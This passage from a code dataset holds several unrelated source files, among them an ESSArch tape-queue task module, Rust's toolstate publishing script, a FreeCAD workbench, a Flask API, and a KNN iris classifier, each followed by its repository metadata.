track = False\n\n def run(self):\n force_entries = RobotQueue.objects.filter(\n req_type=30, status__in=[0, 2]\n ).select_related('storage_medium').order_by('-status', 'posted')\n\n non_force_entries = RobotQueue.objects.filter(\n status__in=[0, 2]\n ).exclude(req_type=30).select_related('storage_medium').order_by('-status', '-req_type', 'posted')[:5]\n\n entries = list(force_entries) + list(non_force_entries)\n\n if not len(entries):\n raise Ignore()\n\n for entry in entries:\n entry.status = 2\n entry.save(update_fields=['status'])\n\n medium = entry.storage_medium\n\n if entry.req_type == 10: # mount\n if medium.tape_drive is not None: # already mounted\n if hasattr(entry, 'io_queue_entry'): # mounting for read or write\n if medium.tape_drive.io_queue_entry != entry.io_queue_entry:\n raise TapeMountedAndLockedByOtherError(\n \"Tape already mounted and 
locked by '%s'\" % medium.tape_drive.io_queue_entry\n )\n\n entry.delete()\n\n raise TapeMountedError(\"Tape already mounted\")\n\n drive = entry.tape_drive\n\n if drive is None:\n free_drive = TapeDrive.objects.filter(\n status=20, storage_medium__isnull=True, io_queue_entry__isnull=True, locked=False,\n ).order_by('num_of_mounts').first()\n\n if free_drive is None:\n raise ValueError('No tape drive available')\n\n drive = free_drive\n\n free_robot = Robot.objects.filter(robot_queue__isnull=True).first()\n\n if free_robot is None:\n raise ValueError('No robot available')\n\n entry.robot = free_robot\n entry.status = 5\n entry.save(update_fields=['robot', 'status'])\n\n with allow_join_result():\n\n try:\n ProcessTask.objects.create(\n name=\"ESSArch_Core.tasks.MountTape\",\n params={\n 'medium': medium.pk,\n 'drive': drive.pk,\n }\n ).run().get()\n except TapeMountedError:\n entry.delete()\n raise\n except BaseException:\n entry.status = 100\n raise\n else:\n medium.tape_drive = drive\n medium.save(update_fields=['tape_drive'])\n entry.delete()\n finally:\n entry.robot = None\n entry.save(update_fields=['robot', 'status'])\n\n elif entry.req_type in [20, 30]: # unmount\n if medium.tape_drive is None: # already unmounted\n entry.delete()\n raise TapeUnmountedError(\"Tape already unmounted\")\n\n if medium.tape_drive.locked:\n if entry.req_type == 20:\n raise TapeDriveLockedError(\"Tape locked\")\n\n free_robot = Robot.objects.filter(robot_queue__isnull=True).first()\n\n if free_robot is None:\n raise ValueError('No robot available')\n\n entry.robot = free_robot\n entry.status = 5\n entry.save(update_fields=['robot', 'status'])\n\n with allow_join_result():\n try:\n ProcessTask.objects.create(\n name=\"ESSArch_Core.tasks.UnmountTape\",\n params={\n 'drive': medium.tape_drive.pk,\n }\n ).run().get()\n except TapeUnmountedError:\n entry.delete()\n raise\n except BaseException:\n entry.status = 100\n raise\n else:\n medium.tape_drive = None\n medium.save(update_fields=['tape_drive'])\n entry.delete()\n finally:\n entry.robot = None\n entry.save(update_fields=['robot', 'status'])\n\n\nclass UnmountIdleDrives(DBTask):\n track = False\n\n def run(self):\n idle_drives = TapeDrive.objects.filter(\n status=20, storage_medium__isnull=False,\n last_change__lte=timezone.now() - F('idle_time'),\n locked=False,\n )\n\n if not idle_drives.exists():\n raise Ignore()\n\n for drive in idle_drives.iterator():\n robot_queue_entry_exists = RobotQueue.objects.filter(\n storage_medium=drive.storage_medium, req_type=20, status__in=[0, 2]\n ).exists()\n if not robot_queue_entry_exists:\n RobotQueue.objects.create(\n user=User.objects.get(username='system'),\n storage_medium=drive.storage_medium,\n req_type=20, status=0,\n )\n\n\nclass ScheduleAppraisalJobs(DBTask):\n track = False\n\n def run(self):\n now = timezone.now()\n\n # get rules without future jobs scheduled\n rules = AppraisalRule.objects.filter(\n information_packages__isnull=False, information_packages__active=True,\n information_packages__appraisal_date__lte=now\n ).exclude(jobs__start_date__gte=now).exclude(frequency__exact='')\n\n for rule in rules.iterator():\n cron_entry = CronTab(rule.frequency)\n\n try:\n latest_job = rule.jobs.latest()\n delay = cron_entry.next(timezone.localtime(latest_job.start_date))\n last = latest_job.start_date\n except AppraisalJob.DoesNotExist:\n # no job has been created yet\n delay = cron_entry.next(timezone.localtime(now))\n last = now\n\n next_date = last + datetime.timedelta(seconds=delay)\n 
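# CronTab.next() returns the number of seconds until the rule's next
# scheduled occurrence, measured from the previous job's start (or from
# 'now' when the rule has no jobs yet), so adding it to 'last' yields the
# start date for the next AppraisalJob created below.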
AppraisalJob.objects.create(rule=rule, start_date=next_date)\n\n\nclass PollAppraisalJobs(DBTask):\n track = False\n\n def run(self):\n now = timezone.now()\n jobs = AppraisalJob.objects.select_related('rule').filter(status=celery_states.PENDING, start_date__lte=now)\n\n for job in jobs.iterator():\n job.run()\n\n\nclass ScheduleConversionJobs(DBTask):\n track = False\n\n def run(self):\n now = timezone.now()\n\n # get rules without future jobs scheduled\n rules = ConversionRule.objects.filter(\n information_packages__isnull=False, information_packages__active=True,\n ).exclude(jobs__start_date__gte=now).exclude(frequency__exact='')\n\n for rule in rules.iterator():\n cron_entry = CronTab(rule.frequency)\n\n try:\n latest_job = rule.jobs.latest()\n delay = cron_entry.next(timezone.localtime(latest_job.start_date))\n last = latest_job.start_date\n except ConversionJob.DoesNotExist:\n # no job has been created yet\n delay = cron_entry.next(timezone.localtime(now))\n last = now\n\n next_date = last + datetime.timedelta(seconds=delay)\n ConversionJob.objects.create(rule=rule, start_date=next_date)\n\n\nclass PollConversionJobs(DBTask):\n track = False\n\n def run(self):\n now = timezone.now()\n jobs = ConversionJob.objects.select_related('rule').filter(status=celery_states.PENDING, start_date__lte=now)\n\n for job in jobs.iterator():\n job.run()\n","repo_name":"OskarPersson/ESSArch","sub_path":"ESSArch_Core/workflow/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":17066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"16777639187","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# This script computes the new \"current\" toolstate for the toolstate repo (not to be\n# confused with publishing the test results, which happens in `src/bootstrap/toolstate.rs`).\n# It gets called from `src/ci/publish_toolstate.sh` when a new commit lands on `master`\n# (i.e., after it passed all checks on `auto`).\n\nfrom __future__ import print_function\n\nimport sys\nimport re\nimport os\nimport json\nimport datetime\nimport collections\nimport textwrap\ntry:\n import urllib2\n from urllib2 import HTTPError\nexcept ImportError:\n import urllib.request as urllib2\n from urllib.error import HTTPError\ntry:\n import typing # noqa: F401 FIXME: py2\nexcept ImportError:\n pass\n\n# List of people to ping when the status of a tool or a book changed.\n# These should be collaborators of the rust-lang/rust repository (with at least\n# read privileges on it). 
CI will fail otherwise.\nMAINTAINERS = {\n 'book': {'carols10cents'},\n 'nomicon': {'frewsxcv', 'Gankra', 'JohnTitor'},\n 'reference': {'Havvy', 'matthewjasper', 'ehuss'},\n 'rust-by-example': {'marioidival'},\n 'embedded-book': {'adamgreig', 'andre-richter', 'jamesmunns', 'therealprof'},\n 'edition-guide': {'ehuss'},\n 'rustc-dev-guide': {'spastorino', 'amanjeev', 'JohnTitor'},\n}\n\nLABELS = {\n 'book': ['C-bug'],\n 'nomicon': ['C-bug'],\n 'reference': ['C-bug'],\n 'rust-by-example': ['C-bug'],\n 'embedded-book': ['C-bug'],\n 'edition-guide': ['C-bug'],\n 'rustc-dev-guide': ['C-bug'],\n}\n\nREPOS = {\n 'book': 'https://github.com/rust-lang/book',\n 'nomicon': 'https://github.com/rust-lang/nomicon',\n 'reference': 'https://github.com/rust-lang/reference',\n 'rust-by-example': 'https://github.com/rust-lang/rust-by-example',\n 'embedded-book': 'https://github.com/rust-embedded/book',\n 'edition-guide': 'https://github.com/rust-lang/edition-guide',\n 'rustc-dev-guide': 'https://github.com/rust-lang/rustc-dev-guide',\n}\n\ndef load_json_from_response(resp):\n # type: (typing.Any) -> typing.Any\n content = resp.read()\n if isinstance(content, bytes):\n content_str = content.decode('utf-8')\n else:\n print(\"Refusing to decode \" + str(type(content)) + \" to str\")\n return json.loads(content_str)\n\n\ndef read_current_status(current_commit, path):\n # type: (str, str) -> typing.Mapping[str, typing.Any]\n '''Reads build status of `current_commit` from content of `history/*.tsv`\n '''\n with open(path, 'r') as f:\n for line in f:\n (commit, status) = line.split('\\t', 1)\n if commit == current_commit:\n return json.loads(status)\n return {}\n\n\ndef gh_url():\n # type: () -> str\n return os.environ['TOOLSTATE_ISSUES_API_URL']\n\n\ndef maybe_remove_mention(message):\n # type: (str) -> str\n if os.environ.get('TOOLSTATE_SKIP_MENTIONS') is not None:\n return message.replace(\"@\", \"\")\n return message\n\n\ndef issue(\n tool,\n status,\n assignees,\n relevant_pr_number,\n relevant_pr_user,\n labels,\n github_token,\n):\n # type: (str, str, typing.Iterable[str], str, str, typing.List[str], str) -> None\n '''Open an issue about the toolstate failure.'''\n if status == 'test-fail':\n status_description = 'has failing tests'\n else:\n status_description = 'no longer builds'\n request = json.dumps({\n 'body': maybe_remove_mention(textwrap.dedent('''\\\n Hello, this is your friendly neighborhood mergebot.\n After merging PR {}, I observed that the tool {} {}.\n A follow-up PR to the repository {} is needed to fix the fallout.\n\n cc @{}, do you think you would have time to do the follow-up work?\n If so, that would be great!\n ''').format(\n relevant_pr_number, tool, status_description,\n REPOS.get(tool), relevant_pr_user\n )),\n 'title': '`{}` no longer builds after {}'.format(tool, relevant_pr_number),\n 'assignees': list(assignees),\n 'labels': labels,\n })\n print(\"Creating issue:\\n{}\".format(request))\n response = urllib2.urlopen(urllib2.Request(\n gh_url(),\n request.encode(),\n {\n 'Authorization': 'token ' + github_token,\n 'Content-Type': 'application/json',\n }\n ))\n response.read()\n\n\ndef update_latest(\n current_commit,\n relevant_pr_number,\n relevant_pr_url,\n relevant_pr_user,\n pr_reviewer,\n current_datetime,\n github_token,\n):\n # type: (str, str, str, str, str, str, str) -> str\n '''Updates `_data/latest.json` to match build result of the given commit.\n '''\n with open('_data/latest.json', 'r+') as f:\n latest = json.load(f, object_pairs_hook=collections.OrderedDict)\n\n 
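# Snapshot the new commit's per-platform results: for each OS, pull the
# tool -> status mapping recorded for current_commit in history/<os>.tsv.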
current_status = {\n os_: read_current_status(current_commit, 'history/' + os_ + '.tsv')\n for os_ in ['windows', 'linux']\n }\n\n slug = 'rust-lang/rust'\n message = textwrap.dedent('''\\\n 📣 Toolstate changed by {}!\n\n Tested on commit {}@{}.\n Direct link to PR: <{}>\n\n ''').format(relevant_pr_number, slug, current_commit, relevant_pr_url)\n anything_changed = False\n for status in latest:\n tool = status['tool']\n changed = False\n create_issue_for_status = None # set to the status that caused the issue\n\n for os_, s in current_status.items():\n old = status[os_]\n new = s.get(tool, old)\n status[os_] = new\n maintainers = ' '.join('@'+name for name in MAINTAINERS.get(tool, ()))\n # comparing the strings, but they are ordered appropriately:\n # \"test-pass\" > \"test-fail\" > \"build-fail\"\n if new > old:\n # things got fixed or at least the status quo improved\n changed = True\n message += '🎉 {} on {}: {} → {} (cc {}).\\n' \\\n .format(tool, os_, old, new, maintainers)\n elif new < old:\n # tests or builds are failing and were not failing before\n changed = True\n title = '💔 {} on {}: {} → {}' \\\n .format(tool, os_, old, new)\n message += '{} (cc {}).\\n' \\\n .format(title, maintainers)\n # See if we need to create an issue.\n # Create issue if things no longer build.\n # (No issue for mere test failures to avoid spurious issues.)\n if new == 'build-fail':\n create_issue_for_status = new\n\n if create_issue_for_status is not None:\n try:\n issue(\n tool, create_issue_for_status, MAINTAINERS.get(tool, ()),\n relevant_pr_number, relevant_pr_user, LABELS.get(tool, []),\n github_token,\n )\n except HTTPError as e:\n # network errors will simply end up not creating an issue, but that's better\n # than failing the entire build job\n print(\"HTTPError when creating issue for status regression: {0}\\n{1!r}\"\n .format(e, e.read()))\n except IOError as e:\n print(\"I/O error when creating issue for status regression: {0}\".format(e))\n except:\n print(\"Unexpected error when creating issue for status regression: {0}\"\n .format(sys.exc_info()[0]))\n raise\n\n if changed:\n status['commit'] = current_commit\n status['datetime'] = current_datetime\n anything_changed = True\n\n if not anything_changed:\n return ''\n\n f.seek(0)\n f.truncate(0)\n json.dump(latest, f, indent=4, separators=(',', ': '))\n return message\n\n\n# Warning: Do not try to add a function containing the body of this try block.\n# There are variables declared within that are implicitly global; it is unknown\n# which ones precisely but at least this is true for `github_token`.\ntry:\n if __name__ != '__main__':\n exit(0)\n\n cur_commit = sys.argv[1]\n cur_datetime = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')\n cur_commit_msg = sys.argv[2]\n save_message_to_path = sys.argv[3]\n github_token = sys.argv[4]\n\n # assume that PR authors are also owners of the repo where the branch lives\n relevant_pr_match = re.search(\n r'Auto merge of #([0-9]+) - ([^:]+):[^,]+, r=(\\S+)',\n cur_commit_msg,\n )\n if relevant_pr_match:\n number = relevant_pr_match.group(1)\n relevant_pr_user = relevant_pr_match.group(2)\n relevant_pr_number = 'rust-lang/rust#' + number\n relevant_pr_url = 'https://github.com/rust-lang/rust/pull/' + number\n pr_reviewer = relevant_pr_match.group(3)\n else:\n number = '-1'\n relevant_pr_user = 'ghost'\n relevant_pr_number = ''\n relevant_pr_url = ''\n pr_reviewer = 'ghost'\n\n message = update_latest(\n cur_commit,\n relevant_pr_number,\n relevant_pr_url,\n relevant_pr_user,\n pr_reviewer,\n 
cur_datetime,\n github_token,\n )\n if not message:\n print('')\n sys.exit(0)\n\n print(message)\n\n if not github_token:\n print('Dry run only, not committing anything')\n sys.exit(0)\n\n with open(save_message_to_path, 'w') as f:\n f.write(message)\n\n # Write the toolstate comment on the PR as well.\n issue_url = gh_url() + '/{}/comments'.format(number)\n response = urllib2.urlopen(urllib2.Request(\n issue_url,\n json.dumps({'body': maybe_remove_mention(message)}).encode(),\n {\n 'Authorization': 'token ' + github_token,\n 'Content-Type': 'application/json',\n }\n ))\n response.read()\nexcept HTTPError as e:\n print(\"HTTPError: %s\\n%r\" % (e, e.read()))\n raise\n","repo_name":"rust-lang/rust","sub_path":"src/tools/publish_toolstate.py","file_name":"publish_toolstate.py","file_ext":"py","file_size_in_byte":10163,"program_lang":"python","lang":"en","doc_type":"code","stars":87195,"dataset":"github-code","pt":"61"} +{"seq_id":"38001658428","text":"from math import sqrt\n\ndef pitagoras(a, b):\n h = sqrt(((a**2) + (b**2)))\n\n return h\n\ncat_a = int(input('Digite o valor do primeiro cateto: '))\ncat_b = int(input('Digite o valor do segundo cateto: '))\n\nresult = pitagoras(cat_a, cat_b)\n\nprint(f'O valor da hipotenusa desse triangulo é {result}')","repo_name":"JorgeRoniel/Curso-de-Python","sub_path":"seção_8/exercicios_s8/exer8.py","file_name":"exer8.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19934612498","text":"import os\nimport FreeCADGui as Gui\nimport FreeCAD as App\nfrom freecad.casat import *\nfrom freecad.casat.version import __version__\n\n\nclass casat_workbench(Gui.Workbench):\n \"\"\"\n class which gets initiated at starup of the gui\n \"\"\"\n\n #Constants for UI locations for toolboxes\n MENU = 1\n TOOLBAR = 2\n CONTEXT = 4\n\n #Workbench GUI-specific attributes\n MenuText = \"Casat\" # + str(__version__)\n ToolTip = \"Curve And Surface Additional Tools, a Freecad workbench\"\n Icon = os.path.join(ICONPATH, \"casat_wb.svg\")\n\n def __init__(self):\n \"\"\"Workbench Constructor\"\"\"\n self.toolbox = ['bspline_to_console']\n self.command_ui = {\n 'Casat': {\n 'gui': self.MENU + self.TOOLBAR + self.CONTEXT,\n 'cmd': ['casat_face_mapping', 'casat_flatten_face', 'casat_isocurves', 'to_console']\n },\n #'Casat': {\n #'gui': self.TOOLBAR,\n #'cmd': ['casat_flatten_face', 'casat_isocurves', 'to_console']\n #},\n #'Casat': {\n #'gui': self.CONTEXT,\n #'cmd': ['casat_flatten_face', 'casat_isocurves', 'to_console', ]\n #},\n 'Devel': {\n 'gui': self.TOOLBAR,\n 'cmd': ['to_console', 'bspline_to_console']\n },\n }\n\n def GetClassName(self):\n return \"Gui::PythonWorkbench\"\n\n def Initialize(self):\n \"\"\"\n This function is called at the first activation of the workbench.\n Import commands here\n \"\"\"\n message(\"Activation\\n\\n *** Welcome to CASAT workbench. 
***\\nC.A.S.A.T -> Curve And Surface Additional Tools\\n\")\n #import commands here to be added to the user interface\n #from .gui.commands import my_command_1, my_command_2, my_command_3\n from .gui.commands import dev_tools\n from .gui.commands import face_isocurves\n from .gui.commands import face_flattening\n from .gui.commands import face_mapping\n\n #iterate the command toolboxes defined in __init__() and add\n #them to the UI according to the assigned location flags\n for _k, _v in self.command_ui.items():\n\n if _v['gui'] & self.TOOLBAR:\n self.appendToolbar(_k, _v['cmd'])\n\n if _v['gui'] & self.MENU:\n self.appendMenu(_k, _v['cmd'])\n\n if (_k == 'Devel') and FreeCAD.ParamGet(\"User parameter:BaseApp/Preferences/Mod/Casat\").GetBool('Devel', False):\n self.appendToolbar(_k, _v['cmd'])\n\n def Activated(self):\n \"\"\"\n Workbench activation occurs when switched to\n \"\"\"\n pass\n\n def Deactivated(self):\n \"\"\"\n Workbench deactivation occurs when switched away from in the UI\n \"\"\"\n pass\n\n def ContextMenu(self, recipient):\n \"\"\"\n Right-click menu options\n \"\"\"\n #if recipient == \"View\":\n #contextlist = [\"adjacent_faces\",\"bspline_to_console\"] # list of commands\n #self.appendContextMenu(\"Curves\",contextlist)\n #elif recipient == \"Tree\":\n #contextlist = [] # list of commands\n #self.appendContextMenu(\"Curves\",contextlist)\n #Populate the context menu when it's called\n for _k, _v in self.command_ui.items():\n if _v['gui'] & self.CONTEXT:\n self.appendContextMenu(_k, _v['cmd'])\n\nGui.addWorkbench(casat_workbench())\n","repo_name":"tomate44/casat","sub_path":"freecad/casat/init_gui.py","file_name":"init_gui.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72703278274","text":"import os\nfrom flask import Flask\nfrom flask_swagger_ui import get_swaggerui_blueprint\nfrom api.predictor.views import predictor\nfrom mongoengine import *\nfrom flask_cors import CORS\nfrom utils.CustomJsonEncoder import CustomJSONEncoder\n\n\napp = Flask(__name__)\napp.json_encoder = CustomJSONEncoder\n\nclient = connect(host=os.environ.get('MONGODB_URI'))\n\n# Settings\nCORS(app)\n\nSWAGGER_URL = '/api/docs'\nAPI_URL = '/static/swagger.json'\n\nswaggerui_blueprint = get_swaggerui_blueprint(\n SWAGGER_URL,\n API_URL,\n config={\n 'app_name': \"iContracts application\"\n },\n)\n\n\n@app.get('/')\ndef hello_world():\n return 'Hello, this is the API Rest for iContracts!'\n\n\napp.register_blueprint(swaggerui_blueprint)\napp.register_blueprint(predictor, url_prefix='/api/v1')\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"isa-group/iContracts","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26543175720","text":"from launcher import Launcher\nimport argparse\nimport json\n\n\ndef cvt_args2dict(args):\n filled_settings = {}\n for args_key, args_value in args._get_kwargs():\n if args_value:\n if args_key == 'anchors':\n args_value = json.loads(args_value)\n filled_settings[args_key] = args_value\n if len(filled_settings) == 0:\n return None\n return filled_settings\n\n\nif __name__ == '__main__':\n # 控制台可输入参数\n args_dict = {'launch_mode': ['--launch_mode', None, str, '指定启动模式'],\n 'dataset_dir': ['--dataset_dir', None, str, '训练数据目录'],\n 'valid_dir': ['--valid_dir', None, str, '验证数据目录'],\n 'test_dir': ['--test_dir', 
None, str, '测试数据目录'],\n 'net_path': ['--net_path', None, str, '网络保存路径'],\n 'anchors': ['--anchors', None, str, '目标参考框'],\n 'epochs': ['--epochs', None, int, '训练轮次'],\n 'batch_size': ['--batch_size', None, int, '训练批次大小'],\n 'is_new': ['--is_new', False, bool, '指定是否重头训练'],\n 'log_dir': ['--log_dir', None, str, 'Loss画图保存地址'],\n 'plot_interval': ['--plot_interval', None, int, 'Loss画图的间隔'],\n 'save_loss_plot': ['--save_loss_plot', False, bool, '是否保存Loss画图'],\n 'plot_pause': ['--plot_pause', None, float, '画图暂定时长'],\n 'plot_loss': ['--plot_loss', False, bool, '是否可视化Loss'],\n 'optimizer': ['--optimizer', None, str, '优化器指定,默认为Adam']}\n parser = argparse.ArgumentParser(description='Hyperparams')\n for args_key, args_list in args_dict.items():\n parser.add_argument(args_list[0], nargs='?', default=args_list[1], type=args_list[2], help=args_list[3])\n args = parser.parse_args()\n # 转换控制台输入的参数为dict\n filled_settings = cvt_args2dict(args)\n runner = Launcher(filled_settings)\n runner.run()\n","repo_name":"EinKung/YoloTiny","sub_path":"train_console.py","file_name":"train_console.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41887761606","text":"from __future__ import division\nimport operator\nimport pandas as pd\nimport numpy as np\nimport argparse\nfrom ConfusionMatrix import confusionMatrix, plotConfusionMatrix\n\n\ndef readData(file):\n '''\n reads the content of the file and returns X(features) and Y(labels)\n :param file: name of the file\n :return: features, labels\n '''\n dataset = pd.read_csv(file, header=None)\n data_shuffled = dataset.sample(frac=1)\n\n X = data_shuffled.iloc[:, 0:4].values\n Y = data_shuffled.iloc[:, 4].values\n #return X.reshape((-1,4)), Y.reshape((-1,1))\n return X.reshape((-1,4)), Y\n\ndef euclideanDistance(p1,p2):\n '''\n calculation of euclidean distance\n :param p1:\n :param p2:\n :return:\n '''\n dist = np.sqrt(np.sum((p1 - p2) ** 2))\n return dist\n\ndef cosineSimilarity(p1,p2):\n '''\n calculation of cosine similarity\n :param p1:\n :param p2:\n :return:\n '''\n cos = np.dot(p1, p2) / (np.sqrt(np.dot(p1, p1)) * np.sqrt(np.dot(p2, p2)))\n return cos\n\n\ndef nearestNeighbors(X_train, Y_train, x_test_sample, k, metric):\n '''\n evaluates K nearest neighbors for the given test sample\n :param X_train: Training set features\n :param Y_train: Training set labels\n :param x_test_sample: features/attributes of a test sample\n :param k: K-nearest neighbors\n :param metric: distance metric, either euclidean or cosine\n :return: list of K nearest neighbors\n '''\n distances = []\n\n if metric == 'euclidean':\n for i in range(len(X_train)):\n distance = euclideanDistance(X_train[i], x_test_sample)\n distances.append((distance, Y_train[i]))\n distances.sort(key=operator.itemgetter(0))\n\n elif metric == 'cosine':\n for i in range(len(X_train)):\n distance = cosineSimilarity(X_train[i], x_test_sample)\n distances.append((distance, Y_train[i]))\n distances.sort(key=operator.itemgetter(0), reverse=True)\n\n else:\n for i in range(len(X_train)):\n distance = euclideanDistance(X_train[i], x_test_sample)\n distances.append((distance, Y_train[i]))\n distances.sort(key=operator.itemgetter(0))\n\n nearestNeighbors = distances[:k]\n return nearestNeighbors\n\ndef getPredictedClass(neighbors):\n '''\n :param neighbors: list of neighbors\n :return: nearest neighbor or predicted class\n '''\n counter = {}\n for item in neighbors:\n class_type = item[1]\n if class_type in counter:\n 
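# Tally one vote per neighbor for its class; the class with the most
# votes among the k neighbors is returned as the prediction below.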
counter[class_type] +=1\n else:\n counter[class_type] = 1\n nearestNeighbor = max(counter.items(), key = operator.itemgetter(1))[0]\n return nearestNeighbor\n\n\ndef getAccuracy(true_labels, predictions):\n '''\n calculates accuracy\n :param true_labels:\n :param predictions:\n :return: returns accuracy\n '''\n result = list(map(lambda x,y: (1 if x==y else 0), predictions, true_labels))\n accuracy = sum(result)/(len(result))\n return accuracy\n\ndef knn(X_train, Y_train, X_test, Y_test, k=3, metric=\"euclidean\"):\n '''\n Implementation of K-Nearest Neighbors\n :param X_train: Training set features\n :param Y_train: Training set labels\n :param X_test: Test set features\n :param Y_test: Test set labels\n :param k: K-nearest neighbors\n :param metric: distance metric, either euclidean or cosine\n :return: accuracy, confusion matrix and list of unique classes\n '''\n predictions = []\n for i in range(len(X_test)):\n neighbors = nearestNeighbors(X_train, Y_train, X_test[i], k, metric)\n predicted_class = getPredictedClass(neighbors)\n predictions.append(predicted_class)\n #print(predicted_class, Y_test[i])\n accuracy = getAccuracy(Y_test, predictions)\n cm, classes = confusionMatrix(Y_test, predictions)\n return accuracy, cm, classes\n\ndef knnWithCrossValidation(X,Y, k=3, cv=5, metric=\"euclidean\"):\n '''\n KNN with cross validation\n :param X: Features\n :param Y: Labels\n :param k: K-nearest neighbors\n :param cv: n-fold cross-validation\n :param metric: distance metric, either euclidean or cosine\n :return: average-accuracy, average-confusion matrix and list of unique classes\n '''\n\n accuracies = []\n confusion_matrices = []\n num_samples = len(X)\n length_test = int((1/cv)*num_samples)\n u = 0\n v = length_test\n for i in range(cv):\n print(\"********************************************************************\\n\"\n \"Iteration {0} of {1}-fold cross-validation\".format(i + 1, cv))\n\n #print(\"u:\", u, \"v:\", v)\n X_test = X[u:v]\n X_train = np.concatenate((X[0:u], X[v:num_samples]), axis=0)\n Y_test = Y[u:v]\n Y_train = np.concatenate((Y[0:u], Y[v:num_samples]), axis=0)\n u = u + length_test\n v = v + length_test\n accuracy, cm, classes = knn(X_train, Y_train, X_test, Y_test, k, metric)\n\n accuracies.append(accuracy)\n confusion_matrices.append(cm)\n\n print(\"=>Accuracy: \", accuracy)\n print(\"=>Confusion Matrix:\\n \"\n \"{0}\\n\"\n \"{1}\\n\".format(classes, cm))\n\n #print(accuracies)\n average_accuracy = sum(accuracies) / len(accuracies)\n sum_cm = 0\n for cm in confusion_matrices:\n sum_cm = sum_cm + cm\n average_cm = sum_cm/len(confusion_matrices)\n\n return average_accuracy, average_cm, classes\n\n\ndef main():\n parser = argparse.ArgumentParser(description = 'KNN Classifier')\n parser.add_argument('-k', help='Number of nearest neighbors', type=int, required=True)\n parser.add_argument('-m', help='Distance/Similarity Metric',type=str, required=True)\n args = parser.parse_args()\n k = args.k\n metric = args.m\n\n\n print(\"Loading Dataset...\")\n X, Y = readData(\"iris.data\")\n print(\"Completed!\")\n accuracy, cm, classes = knnWithCrossValidation(X,Y, k=k, cv=5, metric=metric.lower())\n print(\"***KNN Classifier (with 5 fold cross validation)***\")\n print(\"Parameters:\"\n \"\\n\\tNearest Neighbors (k): {0}\"\n \"\\n\\tDistance Metric : {1}\".format(k, metric))\n print(\"=>Overall accuracy: \", accuracy)\n print(\"=>Overall Confusion Matrix:\\n \"\n \"{0}\\n\"\n \"{1}\\n\".format(classes, cm))\n print(\"Plotting Confusion Matrix...\")\n plotConfusionMatrix(cm, 
classes,\n normalize=True,\n title=\"Confusion Matrix: KNN Classifier\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"sdevkota007/KNN-And-NaiveBayes-Classifier","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":6433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72535332033","text":"'''\r\nDescription: \r\nVersion: \r\nAuthor: Leidi\r\nDate: 2021-07-09 10:19:01\r\nLastEditors: Leidi\r\nLastEditTime: 2021-08-05 16:57:33\r\n'''\r\n# -*- coding:utf-8 -*-\r\nimport argparse\r\nimport os\r\n\r\nfrom utils.utils import *\r\nfrom utils.distribution_function import *\r\n\r\n\r\ndef distribution(output_path):\r\n \"\"\"分析数据集的分布,包含total、train、val、test\"\"\"\r\n\r\n ImageSets_input_path = check_output_path(os.path.join(\r\n output_path, 'ImageSets')) # 获取数据集ImageSets路径\r\n class_path = check_output_path(ImageSets_input_path, 'classes.names') # 获取数据集类别文件路径 \r\n \r\n class_list = get_class(class_path)\r\n \r\n ttvt_path_list, label_input_path = get_path(output_path) # 获取不同set的txt文件路径列表\r\n every_set_label_list = get_one_set_label_path_list(ttvt_path_list) # 获取每个set.txt文件下图片的标签地址列表 \r\n set_count_dict_list, set_prop_dict_list = make_each_class_count_dict(label_input_path, every_set_label_list, class_list, ImageSets_input_path) #生成不同set的计数字典 \r\n drow(set_count_dict_list, set_prop_dict_list, class_list, ImageSets_input_path) # 在同图片中绘制不同set类别分布柱状图\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(prog='cleaning_7_distribution.py')\r\n parser.add_argument('--out', default=r'/home/leidi/Dataset/hy_highway_myxb_sjt_coco2017_7_classes_output_20210805',\r\n type=str, help='output path')\r\n opt = parser.parse_args()\r\n\r\n output_path = check_output_path(opt.out)\r\n\r\n print('\\nStart to distribution dataset:')\r\n distribution(output_path)\r\n print('Dataset analyze done!')\r\n\r\n","repo_name":"leidi1989/2D_Dataset_clean","sub_path":"Tool/Dataset_cleaning/cleaning_7_distribution.py","file_name":"cleaning_7_distribution.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32272778936","text":"from aquilon.aqdb.model import SrvRecord\nfrom aquilon.worker.broker import BrokerCommand # pylint: disable=W0611\n\n\nclass CommandUpdateSrvRecord(BrokerCommand):\n\n required_parameters = [\"service\", \"protocol\", \"dns_domain\", \"target\"]\n\n def render(self, session, service, protocol, dns_domain, target,\n priority, weight, port, comments, dns_environment, **kwargs):\n name = \"_%s._%s\" % (service.strip().lower(), protocol.strip().lower())\n dbsrv_rec = SrvRecord.get_unique(session, name=name,\n dns_domain=dns_domain,\n dns_environment=dns_environment,\n target=target, compel=True)\n\n if priority:\n dbsrv_rec.priority = priority\n if weight:\n dbsrv_rec.weight = weight\n if port:\n dbsrv_rec.port = port\n if comments is not None:\n dbsrv_rec.comments = comments\n\n session.flush()\n return\n","repo_name":"gombasg/aquilon","sub_path":"lib/python2.6/aquilon/worker/commands/update_srv_record.py","file_name":"update_srv_record.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"70709405956","text":"IN_BLENDER = True\n\nimport random\n\nif IN_BLENDER:\n from . 
